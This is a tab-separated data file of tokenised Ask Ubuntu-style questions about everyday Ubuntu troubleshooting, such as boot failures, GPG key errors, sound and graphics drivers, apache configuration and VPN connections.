520820	automatic shutdown	laptop model compaq-620 , os ubuntu 14.04 . problem : laptop is going to be shutdown automatically . fan is working properly . if i play any video or any song then it works but if the laptop is in the idle sate then suddenly the screen goes black and shutdown . if there is any way to get rid of it please tell me .
520822	pptp connection failures with client vpn	i 'm running trusty on aws and am trying to connect to a client 's vpn . they use softlayer , whose docs recommend connecting with pptp . i 've been able to connect successfully , but the connection is very flaky . the usual problem is that during a download it prints out messages like this in the syslog : sep 6 12:16:55 ip-10-81-174-94 pptp [ 60274 ] : anon warn [ decaps_gre : pptp_gre.c:426 ] : discarding bogus packet 141074 ( expecting 140756 ) sep 6 12:16:56 ip-10-81-174-94 pptp [ 60274 ] : anon warn [ decaps_gre : pptp_gre.c:426 ] : discarding bogus packet 141075 ( expecting 140756 ) sep 6 12:16:56 ip-10-81-174-94 pptp [ 60274 ] : anon warn [ decaps_gre : pptp_gre.c:426 ] : discarding bogus packet 141076 ( expecting 140756 ) sep 6 12:16:57 ip-10-81-174-94 pptp [ 60274 ] : anon warn [ decaps_gre : pptp_gre.c:426 ] : discarding bogus packet 141077 ( expecting 140756 ) sep 6 12:16:58 ip-10-81-174-94 pptp [ 60274 ] : anon warn [ decaps_gre : pptp_gre.c:426 ] : discarding bogus packet 141078 ( expecting 140756 ) sep 6 12:17:20 ip-10-81-174-94 pptp [ 60274 ] : anon warn [ decaps_gre : pptp_gre.c:426 ] : discarding bogus packet 141079 ( expecting 140756 ) sep 6 12:18:20 ip-10-81-174-94 pptp [ 60274 ] : anon warn [ decaps_gre : pptp_gre.c:426 ] : discarding bogus packet 141080 ( expecting 140756 ) sep 6 12:21:20 ip-10-81-174-94 pptp [ 60274 ] : anon warn [ decaps_gre : pptp_gre.c:426 ] : discarding bogus packet 141081 ( expecting 140756 ) sep 6 12:23:20 ip-10-81-174-94 pptp [ 60274 ] : anon warn [ decaps_gre : pptp_gre.c:426 ] : discarding bogus packet 141082 ( expecting 140756 ) sep 6 12:25:20 ip-10-81-174-94 pptp [ 60274 ] : anon warn [ decaps_gre : pptp_gre.c:426 ] : discarding bogus packet 141083 ( expecting 140756 ) sep 6 12:28:08 ip-10-81-174-94 pppd [ 60289 ] : terminating on signal 15 sep 6 12:28:08 ip-10-81-174-94 pptp [ 60288 ] : anon log [ callmgr_main : pptp_callmgr.c:258 ] : closing connection ( shutdown ) sep 6 12:28:08 ip-10-81-174-94 pptp [ 60288 ] : anon log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 12 'call-clear-request' sep 6 12:28:08 ip-10-81-174-94 pptp [ 60288 ] : anon log [ call_callback : pptp_callmgr.c:79 ] : closing connection ( call state ) sep 6 12:28:08 ip-10-81-174-94 pppd [ 60289 ] : connect time 18.8 minutes . sep 6 12:28:08 ip-10-81-174-94 pppd [ 60289 ] : sent 3135048 bytes , received 179722147 bytes . sep 6 12:28:08 ip-10-81-174-94 pppd [ 60289 ] : script /etc/ppp/ip-down started ( pid 65169 ) sep 6 12:28:08 ip-10-81-174-94 pppd [ 60289 ] : sent [ lcp termreq id=0x2 `` user request '' ] sep 6 12:28:08 ip-10-81-174-94 pppd [ 60289 ] : modem hangup sep 6 12:28:08 ip-10-81-174-94 pppd [ 60289 ] : connection terminated . the connection will then terminate and my code that pulls the data will hang forever . other times , i run the same commands and it works fine . it seems like pptp is very very old , and i 'd be perfectly happy to replace it with something else , but it 's pretty unclear to me if that 's possible . is there a better way to be doing this ? or something i 'm missing here ?
520823	how can i contact a user from this site ?	im trying to contact a user called `` mshaffer '' , i tracked him to two different websites but there is not contact link , nor option to comment.he seems to be expertise in the field of a problem iâ´m suffering with tesseract . may someone help me to reach him ? , thanks and kind regards .
520824	ubuntu 14.04 kernel update	i have a problem with updating the kernel on ubuntu 14.04 , the system detects the updates and the latest version is installed , and unfortunately when i start ubuntu i always find the old version or the 3.13.0-30 instead of 3.13.0-35 . how can i fix ? thank you all .
520826	motherboard sound hardware being ignored ( not shown in pacmd list-cards ) how to make ubuntu re-discover it ?	i want to use the internal motherboard sound instead of the sound provided by my graphics card via hdmi ( r700 audio device [ radeon hd 4000 series ) . in the gui and pacmd list-cards at command line , only the radeon is listed . two reasons why i want to use the internal motherboard soundcard : - i want to route the analogue audio out through a mixing desk - video playback is too fast ( youtube and local ) and this appears to be related to the audio on a sound card ( i 've looked at questions on here related to this ) please advise on how i can make ubuntu use the internal sound hardware ( on my motherboard , asrock 775 g31m-gs r2.0 motherboard intel socket m-atx 1333fsb ) \ thank you .
520828	gpg error no_pubkey : warning : the following packages can not be authenticated !	i have just stared to receive some strange errors regarding gpg keys . namely i have just added ppa : ubuntu-toolchain-r/test and wanted to update and after that i got this : w : gpg error : http : //extras.ubuntu.com trusty release : the following signatures could n't be verified because the public key is not available : no_pubkey 16126d3a3e5c1192 w : gpg error : http : //archive.canonical.com trusty release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : //qgis.org trusty inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey 030561bedd45f6c3 w : gpg error : http : //dl.google.com stable release : the following signatures could n't be verified because the public key is not available : no_pubkey a040830f7fac5991 w : gpg error : http : //dl.google.com stable release : the following signatures could n't be verified because the public key is not available : no_pubkey a040830f7fac5991 w : gpg error : http : //archive.ubuntu.com trusty release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : //archive.ubuntu.com trusty-updates release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : //archive.ubuntu.com trusty-security release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 i have tried to resolved it in 2 ways ( provided here ) for key in 40976eaf437d05b5 3b4fe6acc0b21f32 a040830f7fac5991 030561bedd45f6c3 16126d3a3e5c1192 ; do sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys $ key ; done but that did n't help ( the same errors kept coming with the same keys ) so i have tried to do this : sudo add-apt-repository ppa : webupd8team/y-ppa-manager sudo apt-get update sudo apt-get install y-ppa-manager but i got this which opened my eyes : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : launchpad-getkeys libvte-common libvte9 python-keyring python-launchpadlib python-lazr.restfulclient python-lazr.uri python-oauth python-secretstorage python-simplejson python-vte python-wadllib xclip yad suggested packages : python-gdata python-keyczar python-kde4 python-testresources python-secretstorage-doc the following new packages will be installed : launchpad-getkeys libvte-common libvte9 python-keyring python-launchpadlib python-lazr.restfulclient python-lazr.uri python-oauth python-secretstorage python-simplejson python-vte python-wadllib xclip y-ppa-manager yad 0 upgraded , 15 newly installed , 0 to remove and 29 not upgraded . need to get 915 kb of archives . after this operation , 4,515 kb of additional disk space will be used . do you want to continue ? [ y/n ] y warning : the following packages can not be authenticated ! libvte-common libvte9 python-keyring python-lazr.uri python-simplejson python-wadllib python-oauth python-lazr.restfulclient python-launchpadlib python-secretstorage python-vte xclip install these packages without verification ? [ y/n ]
520829	sudo apt-get nautilus error	i am trying to add a little touch to my screen saver . running as root but below , is the error message i get . any help will do please . **tricky @ tricky-dba : ~ $ sudo apt-get nautilus [ sudo ] password for tricky : e : invalid operation nautilus tricky @ tricky-dba : ~ $ sudo apt-get nautil**strong text**us e : invalid operation nautilus tricky @ tricky-dba : ~ $ sudo nautilus ( nautilus:10878 ) : gtk-warning ** : failed to register client : onmanager was not provided by any .service filesgdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessi nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . **
520834	why does ubuntu write to disk when copying files from cd to usb ?	my machine has 18gb of main memory . when copying files from a mounted cd to a mounted usb drive there is a lot of hdd activity . why does ubuntu write to disk when copying from cd to usb ? i assume there is some sort of buffering or caching going on but should the main memory not be sufficient to cache all the files , especially since it is larger than both the cd and the usb drive ?
520835	ca n't access kippo-graph	i have made an instance in aws with ubuntu server 14.04/ 64bit as the os i installed kippo and kippo-graph following this tutorial http : //bruteforce.gr/installing-kippo-ssh-honeypot-on-ubuntu.html and this http : //bruteforce.gr/kippo-graph the issue here is that when i finish i should be able to access kippo graph through web-browser but i only got `` the connection timed out '' error message . i accessed apache error.log file and i got this : [ wed sep 03 18:36:55.145509 2014 ] [ mpm_event : notice ] [ pid 7531 : tid 139861638047616 ] ah00489 : apache/2.4.7 ( ubuntu ) configured -- resuming normal operations [ wed sep 03 18:36:55.145585 2014 ] [ core : notice ] [ pid 7531 : tid 139861638047616 ] ah00094 : command line : '/usr/sbin/apache2' [ wed sep 03 18:37:00.079101 2014 ] [ mpm_event : notice ] [ pid 7531 : tid 139861638047616 ] ah00491 : caught sigterm , shutting down [ wed sep 03 18:37:01.144824 2014 ] [ mpm_prefork : notice ] [ pid 9673 ] ah00163 : apache/2.4.7 ( ubuntu ) configured -- resuming normal operations [ wed sep 03 18:37:01.144893 2014 ] [ core : notice ] [ pid 9673 ] ah00094 : command line : '/usr/sbin/apache2' [ wed sep 03 18:37:02.380591 2014 ] [ mpm_prefork : notice ] [ pid 9673 ] ah00169 : caught sigterm , shutting down [ wed sep 03 18:37:03.483479 2014 ] [ mpm_prefork : notice ] [ pid 9759 ] ah00163 : apache/2.4.7 ( ubuntu ) php/5.5.9-1ubuntu4.3 configured -- resuming normal operations [ wed sep 03 18:37:03.483519 2014 ] [ core : notice ] [ pid 9759 ] ah00094 : command line : '/usr/sbin/apache2' [ wed sep 03 18:37:18.345660 2014 ] [ mpm_prefork : notice ] [ pid 9759 ] ah00169 : caught sigterm , shutting down [ wed sep 03 18:37:19.367742 2014 ] [ mpm_prefork : notice ] [ pid 9818 ] ah00163 : apache/2.4.7 ( ubuntu ) php/5.5.9-1ubuntu4.3 configured -- resuming normal operations [ wed sep 03 18:37:19.367792 2014 ] [ core : notice ] [ pid 9818 ] ah00094 : command line : '/usr/sbin/apache2' [ wed sep 03 18:46:37.568269 2014 ] [ mpm_prefork : notice ] [ pid 9818 ] ah00169 : caught sigterm , shutting down [ wed sep 03 18:47:04.948522 2014 ] [ mpm_prefork : notice ] [ pid 1083 ] ah00163 : apache/2.4.7 ( ubuntu ) php/5.5.9-1ubuntu4.3 configured -- resuming normal operations [ wed sep 03 18:47:04.948926 2014 ] [ core : notice ] [ pid 1083 ] ah00094 : command line : '/usr/sbin/apache2' [ wed sep 03 18:48:36.752137 2014 ] [ mpm_prefork : notice ] [ pid 1083 ] ah00169 : caught sigterm , shutting down [ wed sep 03 18:48:37.826128 2014 ] [ mpm_prefork : notice ] [ pid 1297 ] ah00163 : apache/2.4.7 ( ubuntu ) php/5.5.9-1ubuntu4.3 configured -- resuming normal operations [ wed sep 03 18:48:37.826165 2014 ] [ core : notice ] [ pid 1297 ] ah00094 : command line : '/usr/sbin/apache2' it seems the apache server is up and fine . i also have disabled the firewall as a double caution . i could n't figure out what 's the reason of the problem here .
520837	xubuntu 14.04.1 liveusb failing to boot on sony vaio vgn-nw240f	i created a liveusb using usb-creator-gtk with an md5-sum verified xubuntu-14.04.1-desktop-amd64.iso . i then confirmed the liveusb integrity by verifying all its files against md5sum.txt . i then disabled in the vaio bios all booting devices except for `` external device '' ( which means usb ) , and finally followed the official sony instructions for booting from usb . i tried booting in this way numerous times , and all i got is a black screen with a blinking cursor . nothing else . neither random key-presses nor waiting for over 15 minutes yielded any different result . the laptop is definitely trying to boot from the usb , because when i take the usb drive out and reboot , it complains about the lack of operating system . any idea how i can debug this ?
520839	low desktop performance with netbook	after installing latest ubuntu on my netbook ( asus 1225c ) i experienced major drop in responsiveness and frames per second on desktop . it seems that there is something wrong with video drivers . the screen updates really slow , especially when trying to move windows or terminal or trying to input some text . i did not have the same problem when installing the system , in fact , everything ran very smooth . this seems strange , because the netbook is shipped with ubuntu installed on it . glxinfo | grep renderer returned glx_mesa_multithread_makecurrent , glx_mesa_query_renderer , opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.4 , 128 bits ) after installing kde , the problem is gone . thanks for your answers !
520840	making tab function as a modifier	in ubuntu , how would i do the following : make esc function as tab make tab function as a new modifier key ( perhaps making it the `` hyper_l '' modifier ) that way , i could use ubuntu 's default keyboard shortcut gui to make tab + [ key ] do interesting things like launch programs , or what have you .
520841	copying files as password-protected files into an encrypted ( password-protected ) folder	i have password protected a folder . i made it password-protected by encrypting it from the right-click 'compress ' option . this post helped me do that . all the present files inside my encrypted folder are password-protected now . i want some more files to be added to the encrypted folder . there is no issues for me in adding new files to that folder . but those files are not password protected as the old files . is there a way to copy files into that folder as password protected files straight away ?
520843	stumped on amd catalyst installation 14.04	im following these steps using the first stable manual installation . all has gone well , except in one of the final steps , i 'm to execute this command '' cd fglrx-14.10.1006/fglrx-install . * '' but i keep getting '' bash : cd : fglrx-14.10.1006/fglrx-install . * : no such file or directory '' in response despite looking at this folder in nautilus ! i am very confused and frustrated as the final step is the next one ! admittedly this is the most time i 've spent in terminal so i 'm very new to this . thanks for understanding . am i correct in looking for this directory in the catalyst folder created in my home folder ?
520844	ubuntu 14.04 wo n't connect to internet thru ethernet	i have just installed ubuntu as a dual boot with my windows 7 machine and i can not get it to connect to the internet with the ethernet cable plugged in . it just says connecting for a minute or two and then says you are now disconnect .
520845	skype and steam wo n't load - ubuntu 14.04	i 'm a newbie with linux but have just installed a 32 bit version of ubuntu onto a old laptop . whenever i try to run steam i get this message in the terminal : gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' requested force create but sharedobjectmutex already created forced create but already created for sharedobjectevent forced create but already created for sharedobjectevent gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' installing breakpad exception handler for appid ( steamwebhelper ) /version ( 20140828032355 ) installing breakpad exception handler for appid ( steamwebhelper ) /version ( 1409196235 ) installing breakpad exception handler for appid ( steamwebhelper ) /version ( 20140828032355 ) installing breakpad exception handler for appid ( steamwebhelper ) /version ( 1409196235 ) fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig warning : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 78 : saw unknown , expected number installing breakpad exception handler for appid ( steam ) /version ( 1409240101 ) installing breakpad exception handler for appid ( steam ) /version ( 1409240101 ) installing breakpad exception handler for appid ( steam ) /version ( 1409240101 ) installing breakpad exception handler for appid ( steam ) /version ( 1409240101 ) installing breakpad exception handler for appid ( steam ) /version ( 1409240101 ) [ 0906/154017 : error : renderer_main.cc ( 227 ) ] running without renderer sandbox [ 0906/154017 : error : renderer_main.cc ( 227 ) ] running without renderer sandbox generating new string page texture 12 : 48x256 , total string texture memory is 49.15 kb generating new string page texture 13 : 256x256 , total string texture memory is 311.30 kb generating new string page texture 14 : 128x256 , total string texture memory is 442.37 kb generating new string page texture 15 : 384x256 , total string texture memory is 835.58 kb fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig warning : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 78 : saw unknown , expected number if i right click the steam icon i get the normal store library list but nothing loads , this also happens with skype it appears to load but no login window appears . reading other responses to similar problems i 've tried installing the lib32 files but this has had no effect .
520846	help ! install ubuntu in win8 but can not get into operation system	i just start to use ubuntu and need your help . i have a win8.1 laptop . i tried to install the ubuntu on a logical partitions . the installation process is successful . but when i restart the system , on operation system worked . only a msdos interface and nothing else . it seems that system boot is lost . how can i repair it ? thanks
520847	nautilus crashes on file/folder drag , icon issues 14.04	ubuntu 14.04 , unity . nautilus crashes without error message when i try to drag any file/folder . left click and hold on anything , the second it moves a millimeter , nautilus crashes/closes . additionally , the `` open with '' icons and unity dash icons are individually all different sizes . also the prntscr key stopped working properly all this may be a compiz issue vice nautilus . please let me know of any analytic information that may help . additionally , if i press ctrl in an open nautilus window ... nautilus closes.. : ( additionally , i actually cant type in an open nautilus window ( like to jump to something ) segmentation fault ( core dumped ) is the error in terminal when it crashes additionally : all my radial and check boxes are gone additionally : unity control center crashes when themes are selected
520849	how to get a direct download of alternative flash player for ubuntu ( adobe page launches ubuntu software centre which reports 'file not found ' )	to be frank , this page is useless : http : //get.adobe.com/flashplayer/otherversions/ clicking download causes ubuntu software centre to be launched which reports file not found . frustrating . so how can i get a direct file download of the flash player ? i would like this as i 'm having the video playing too fast problem see by a few others around here and elsewhere and the alternative flash may solve the issue . hardware : asrock 775 g31m-gs r2.0 motherboard intel socket m-atx 1333fsb ( with internal audio ) r700 audio device [ radeon hd 4000 series ]
520850	varnish 4 on 12.04	i would like to use the latest version of varnish ( 4.0.1 ) on precise . i tried following the instructions posted here : https : //www.varnish-cache.org/installation/ubuntu apt-get install apt-transport-https curl https : //repo.varnish-cache.org/ubuntu/gpg-key.txt | apt-key add - echo `` deb https : //repo.varnish-cache.org/ubuntu/ precise varnish-4.0 '' > > /etc/apt/sources.list.d/varnish-cache.list apt-get update apt-get install varnish however this does not work - i always end up with the older version of varnish installed ( 3.0.2-1 ) . what else do i need to do to get the latest version installed ?
520851	ca n't write in hebrew in whatsapp in genymotion	i am using geneymotion , and i installed whatsapp . everything is working well , but when i try to type in hebrew , it just does n't show anything . how do i make writing in hebrew supported ? thanks for helping !
520853	how to display the computer icon in the desktop ?	i installed dconf editor and gconf editor . i can enable trash , network and home icon using dconf editor . however , i ca n't find computer icon . i have searched google and many other forums , but i cna't find any results about computer icon details .
520854	multiple monitors with intel gma & radeon hd 5450	i have two monitors , first monitor is connected by d-sub to radeon hd5450 . this monitor works well . second monitor is connected by d-sub to intel gma ( integrated graphic on board ) and system ca n't detect this monitor . i ca n't change connection cable . on windows it worked well , but on linux i ca n't solve my problem . i set in bios startup graphic to intel gma but after os loading monitor is going to switch to hd5450 lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati manhattan [ mobility radeon hd 5430 series ] xrand screen 0 : minimum 320 x 200 , current 1280 x 1024 , maximum 1280 x 1280 dfp1 disconnected ( normal left inverted right x axis y axis ) dfp2 disconnected ( normal left inverted right x axis y axis ) crt1 connected 1280x1024+0+0 ( normal left inverted right x axis y axis ) 337mm x 270mm 1280x1024 60.0*+ 75.0 1280x960 75.0 60.0 1280x768 75.0 60.0 1280x720 75.0 60.0 1024x768 75.0 70.1 60.0 1024x600 75.0 70.1 60.0 800x600 72.2 75.0 60.3 800x480 72.2 75.0 60.3 640x480 75.0 72.8 59.9 /etc/x11/xorg.conf section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` monitor '' identifier `` 0-crt1 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1280x1024 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' option `` monitor-crt1 '' `` 0-crt1 '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection
520855	problem : how do i install windows 8 alongside a pre-existing ubuntu installation ?	i installed ubuntu last month in legacy mode ( bios ) and now i want to install windows 8 but while loading its not detecting windows 8 os boot file ( from usb ) , i think it might be because it is in legay mode and i could not enter into bios also.please help me with these issues .
520856	wifi problem with ubuntu 14.04	i recently moved onto my university campus , and am having trouble connecting to wifi here . it starts by asking me for my username/password , which is normal , but then it tells me that i do n't have a valid ca certificate . when i click choose , the box closes but nothing happens . because of this , i can not connect to the wifi and would appreciate any help you could offer . thanks
520858	missing system settings in 14.04 lts	i just installed 14.04 and tried talking on skype but the other party ca n't hear me . i tried checking the sound settings from system settings and found out that system settings is missing . i ran the command sudo apt-get install ubuntu-desktop and got the error message processing was halted because there were too many errors . error : gdbus.error : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i later ran the command sudo apt-get install unity-control-center and still got the message error : gdbus.error : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) meanwhile , i always get an error message popping up each time i switch on my laptop : system program problem detected do you want to report problem ? i have also uninstalled and re-installed system settings ( unity control center ) via ubuntu software center and it still does n't work . any urgent help will be highly appreciated . thank you
520859	signatures invalid and problem with mergelist error	so , whenever i try to update repos recently ( via apt-get ) , i get something like this : reading package lists ... error ! w : gpg error : http : //ppa.launchpad.net trusty release : the following signatures were invalid : badsig 6af0e1940624a220 launchpad ppa for tualatrix w : gpg error : http : //ppa.launchpad.net trusty release : the following signatures were invalid : badsig 5a9a06aef9cb8db0 launchpad ppa for ubuntu wine team e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/ppa.launchpad.net_libreoffice_libreoffice-4-3_ubuntu_dists_trusty_main_i18n_translation-en % 5fus e : the package lists or status file could not be parsed or opened . when i disable all the ppas , these errors disappeared . is this a problem with the launchpad servers or is the problem within my configuration or something ? i 'm running ubuntu 14.04 .
520861	remove notification area ubuntu 14.04	i 'm a 15minutes old ubuntu user , and i have a question . how do i remove this thing : the notification area annoyance that pops up whenever you think about touching something at the bottom of your screen ? it 's driving me crazy ! : d
520862	cpu freq indicator only runs if i leave the terminal open	i installed indicator-cpufreq and it is in my startup applications . my problem is it only will start if i start it in a terminal and leave the terminal open . it does n't start when logging on and wo n't stay open after i close the terminal . how can i get it to actually start with the computer ?
520864	how to install needed qt packages to build kernel on 14.04 ?	i 'm going to compile kernel on ubuntu 14.04 64-bit , so i start with installing packages that i need : sudo apt-get install build-essential bin86 kernel-package libqt3-headers libqt3-mt-dev wget libncurses5 libncurses5-dev qt4-dev-tools libqt4-dev everything is installed except libqt3-headers and libqt3-mt-dev packages . for those packages i got in terminal : e : unable to locate package libqt3-headers e : unable to locate package libqt3-mt-dev i looked around and it seems like there is no those packages in ubuntu 14.04 repositories . any idea what to do ?
520866	problem with installing ubuntu on virtualbox	i am installing ubuntu 12.04 on virtual box 4.3.12 . i got error as some program trying to access hardware . and ubuntu is not installed .i am using win 8.1 . how to install ubuntu on virtualbox ?
520867	tecknet co18 vs logitech	9-6-14 i have a tecknet co18 1080p webcam that halts the operation of my logitech illuminated wired keyboard . it also does n't seem to have a working microphone ! i started by 1st installing the included software , rebooted the i5 quadcore pc then plugged in the usb camera . the keyboard then halted accepting logitech illuminated keyboard inputs . the included software shows the camera 's view but when i tried skype the testing of the audio does n't work at all ! i 'm on windows 7 64-bit . any and all help is thankfully accepted .
520868	ubuntu 14.04 will not boot after `` successful '' install	i 'm brand new to linux , just wanting to explore a new system . picked up a cheap toshiba c55 and wiped windows 8 off the machine using a liveusb stick . did an overwrite installation from the memory stick , but when i go to reboot following installation ( booting from hdd ) it gives the error , `` reboot and select proper boot device or insert boot media in selected boot device and press any key . '' i followed the suggested solution from this thread , just installed ubuntu 14.04 but after restart it wont boot after running boot-repair but neither of these solutions worked . the boot-repair log is http : //paste.ubuntu.com/8266649/
520869	my system tray icons overlap	i 'm using kde 4.13.3 under ubuntu 14.04.1 lts . the icons in the system tray widget overlap one another , and also overlap whatever is to the right of the system tray in the same panel . here are some screenshots of the affected panel , showing the system tray in various positions : on the far right , in the middle , and then on the far left : what can i do to fix this ?
520870	how do i install driver for the linksys wusb6300 ?	i recently installed ubuntuâ´s recent os 14.04 and am unable to install the driver for my wireless adapter which is the linksys wusb6300 . is there any way to configure the driver in any way , or should i purchase another one ?
520871	basic question about raid/flexraid	i have an ubuntu server install ( 14.04.01 ) that i have been using for about 1 year . its mostly used as a samba and plex server running off one 3tb hard drive . i purchased two more drives with the intention of implementing some sort of raid system . flexraid seems ideal for me but i am worried about how this will affect my system . will this break samba and plex ? i assume that both of those programs are 'pointed ' at a specific partition ( sda3 ) and changing anything will break that .
520872	how to : make a `` restore point '' in ubuntu , in case i break something ?	how can i make a snapshot , a `` restore point '' in ubuntu for when im about to try something i think is clever but turns out to be a `` oh crap , not again '' ?
520874	partitions on clean install ubuntu 14.04.1 lts	i have a 500gb harddrive with 2 operating systems installed : windows 7 ( 120gb ) and ubuntu 13.04 ( 380gb ) . i created my own partitions , by using advice from this tutorial . now i want to upgrade to ubuntu 14.04.1 lts and install windows 7 in a virtual machine of 100gb . here are my questions : since i will no longer have a dual-boot , how do i create my partitions such that they use my entire harddrive ? or is it better to use the default ones that the installer creates ? if yes , on which partition will my virtual machine be ? when i make a clean install of ubuntu will it erase my windows partitions ? this is my current configuration , the output of sudo lsblk -o name , fstype , size , mountpoint , label : name fstype size mountpoint label sda 465.8g ├─sda1 ntfs 100m system reserved ├─sda2 ntfs 19.4g ├─sda3 ntfs 97.7g ├─sda4 1k ├─sda5 ext4 953m /boot ├─sda6 ext4 37.3g / ├─sda7 swap 4.7g [ swap ] └─sda8 ext4 305.7g /home sr0 1024m
520876	mplayer not working after upgrading to 14.04	last night i upgraded to 14.04 from 13.10 . after reboot , i ca n't play mp4 videos on smplayer . ( and also from mplayer using terminal ) i get following error . : ~ $ mplayer '/home/vishwaje/desktop/a-ha - take on me official music video - youtube [ 360p ] .mp4 ' creating config file : /home/vishwaje/.mplayer/config mplayer 1.1-4.8 ( c ) 2000-2012 mplayer team mplayer : could not connect to socket mplayer : no such file or directory failed to open lirc support . you will not be able to use your remote control . playing /home/vishwaje/desktop/a-ha - take on me official music video - youtube [ 360p ] .mp4 . libavformat version 54.20.4 ( external ) mismatching header version 54.20.3 libavformat file format detected . mplayer interrupted by signal 11 in module : demux_open - mplayer crashed by bad usage of cpu/fpu/ram . recompile mplayer with -- enable-debug and make a 'gdb ' backtrace and disassembly . details in docs/html/en/bugreports_what.html # bugreports_crash . - mplayer crashed . this should n't happen . it can be a bug in the mplayer code or in your drivers or in your gcc version . if you think it 's mplayer 's fault , please read docs/html/en/bugreports.html and follow the instructions there . we ca n't and wo n't help unless you provide this information when reporting a possible bug . [ this binary of mplayer in debian is currently compiled with ' -- enable-debug ' ; the debugging symbols are in the package 'mplayer-dbg ' . ] so i reinstalled , and did anything i can . but no luck . please help..
520877	is there any website for ranking ubuntu softwares ?	i using software.toptenreviews.com for windows softwares , but i do n't know how can find best software for ubuntu . thanks for your response !
520880	computer randomly we n't into read only filesystem	i was just typing in abiword and opened up the filesystem and realized everything had the 'lock ' image over it . so i opened the terminal to run an update to see if everything was alright and just as i thought , the system actually had turned over to 'read-only file system . ' this scares me . the last time this happened my laptop did not work for months until i finally had enough and decided to reinstall ubuntu which fixed all problems . this time , i honestly would like to avoid completely reinstalling . i have tried : sudo mount -o rw , remount / but just got the following error : sudo : unable to open /var/lib/sudo/tyler/0 : read-only file system mount : can not remount block device /dev/sda1 read-write , is write-protected i also tried sudo fsck -af -m and just got the read-only error aswell . anyone know whats going on here ?
520885	after upgrade interface is gone and terminal wo n't activate	i can run terminal commands by using a text file on the desktop but i ca n't run the terminal using a keyboard shortcut . ( make sure you are able to run as an executable ) all windows open on top of each other in the top left , have no menu bar and ca n't be moved . i do n't think i can change focus between windows . running the command unity flashes up the ui but it then immediately crashes ( ? ) going into ccsm and disabling some bits did n't change anything . see the image below - i can just see my desktop and the background . i can click with the cursor .
520886	the apache2 config test failed	sorry but i 'm quite new to ubuntu server and i 'm trying to set up my website . i 've configured the ports i think but whenever i try to start apache2 i get this message output of config test was : ah00526 : syntax error on line 12 of /etc/apache2/sites-enabled/000-default.conf : documentroot takes one argument , root directory of document tree action 'configtest ' failed . the apache error log may have more information . it 's worth noting that i changed the default directory with a new one that my homepage is on . should i have moved my files to the root directory and configured something else .
520888	i could not enter into bios and i could not boot from usb also please help me i need to install windows 8	please give me a solution , i have been trying this for two months please help . i could not enter into bios and i could not boot from usb also please help me i need to install windows 8 .
520889	`` ubuntu.connectivity '' is not installed	who can i install ubuntu.connectivity 1.0 on ubuntu 14.04 to use it in my application on nexus4 i have used the example : http : //developer.ubuntu.com/api/qml/sdk-14.10/ubuntu.connectivity.networkingstatus/ and when run it on my device i have the error : `` ubuntu.connectivity '' is not installed processing triggers for mime-support ( 3.55ubuntu1 ) ... processing triggers for hicolor-icon-theme ( 0.13-1 ) ... processing triggers for dbus ( 1.8.6-1ubuntu1 ) ... failed to open connection to `` system '' message bus : failed to connect to socket /var/run/dbus/system_bus_socket : no such file or directory invoke-rc.d : policy-rc.d denied execution of start . processing triggers for udev ( 208-8ubuntu1 ) ... processing triggers for libgdk-pixbuf2.0-0 : amd64 ( 2.30.7-1 ) ... errors were encountered while processing : /var/cache/apt/archives/libunity-scopes3_0.6.4+14.10.20140828.1-0ubuntu1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ( click-ubuntu-sdk-14.10-armhf ) root @ hafmed-hp-probook : /home/haf-med # apt-get install qml-module-ubuntu-connectivity reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these 